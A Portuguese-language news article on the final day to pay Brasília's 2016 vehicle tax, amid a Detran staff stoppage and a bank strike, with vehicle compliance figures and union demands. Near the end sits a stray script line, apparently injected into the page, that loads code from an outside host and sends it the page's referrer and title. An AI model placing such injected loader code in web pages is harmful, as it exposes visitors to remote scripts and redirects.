Último dia para pagar IPVA tem paralisação do Detran e bancos em greve

detran-df-Foto- Tony Winston-Agência Brasília(1) (1)
CATEGORIA É MAIS UMA A ADERIR AO PROTESTO PELOS REAJUSTES SALARIAIS (FOTO: TONY WINSTON/ AGÊNCIA BRASÍLIA)

Esta sexta-feira (30/9), promete ser sinônimo de dor de cabeça para quem deixou para a última hora o pagamento do Imposto sobre a Propriedade de Veículos Automotores (IPVA) de 2016. Os agentes do Departamento de Trânsito do Distrito Federal (Detran) resolveram parar, reivindicando uma série de melhorias para a categoria. A questão é que, segundo levantamento atualizado do órgão fiscalizador, mais de 500 mil carros estão sem o novo documento, o de 2016. Essas pessoas terão de buscar outras maneiras de efetuar o pagamento. Caso contrário, correm o risco de serem multados em R$ 191 mais a retenção do veículo. Isso porque os agentes fiscalizadores descruzam os braços logo na manhã deste sábado (1º/10) e prometem pressionar na cobrança do novo documento.

Para quitar o IPVA, os devedores poderão acessar o site da Secretaria de Fazenda e imprimir a segunda via do documento. Outra opção é ir às agências da Receita do DF ou nos postos do Na Hora. E aí começa outro problema: o pagamento do boleto só pode ser feito nos bancos, que estão em greve há 23 dias, sendo esta a terceira mais longa desde 2004.

Por meio de nota, a assessoria de imprensa do Detran confirmou o início da fiscalização para 1º de outubro. Ainda segundo o texto, “direção-geral do Detran analisará se há a necessidade de alteração da data”. Os veículos irregulares estarão sujeitos a uma despesa extra, de, no mínimo, R$ 524,54 relativos à multa, guincho, diária no deposito, vistoria e serviços de liberação do veículo. 

Atualmente, existem 1.696.619 veículos registrados no DF. Desses, 533.831 não possuem o documento do veículo de 2016. Mais de 130 mil não regularizam a situação há 10 anos. Os que estão de maneira irregular há cinco anos é menor: cerca de 125 mil. O número de veículos que mantêm os documentos irregulares há três anos é de 82 mil. Os motoristas que licenciaram o documento em 2015, mas este ano não fizeram o mesmo é de quase 195 mil.

A expectativa do GDF é arrecadar com o imposto até R$ 882 milhões até o fim de 2016. Os recursos devem ser destinados à manutenção de vias, campanhas de educação de trânsito, para pagar servidores e abastecer hospitais e escolas.

 

Paralisação

Fábio Medeiros, presidente do Sindicato dos Servidores do Detran (Sindetran) explicou que a categoria se mobilizou para exigir a reorganização das carreiras e mudanças de nomenclatura de cargos, negociadas há cerca de um ano. Elas foram barradas pelo Detran, para pressionar o Governo do Distrito Federal a pagar a terceira etapa do reajuste, no valor de 5%, prometida para o mês que vem, e exigir o reajuste do ticket alimentação, que não tem reajuste desde 2014.

Funcionários do órgão farão assembleia nesta sexta-feira e a expectativa é que haja a proposta de votação de greve para próximas semanas “em virtude da falta de resposta do GDF sobre o reajuste”, explica Fábio.

“Essa parcela deveria ter sido paga em novembro de 2015. Estamos em contato com a direção (do Detran) e com a categoria, para nos mantermos mobilizados”, afirmou. “Amanhã é o último dia para pagar o IPVA antes da fiscalização, e nossos postos estão lotados”, acrescentou. O órgão passa a funcionar normalmente já nas primeiras horas do sábado.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário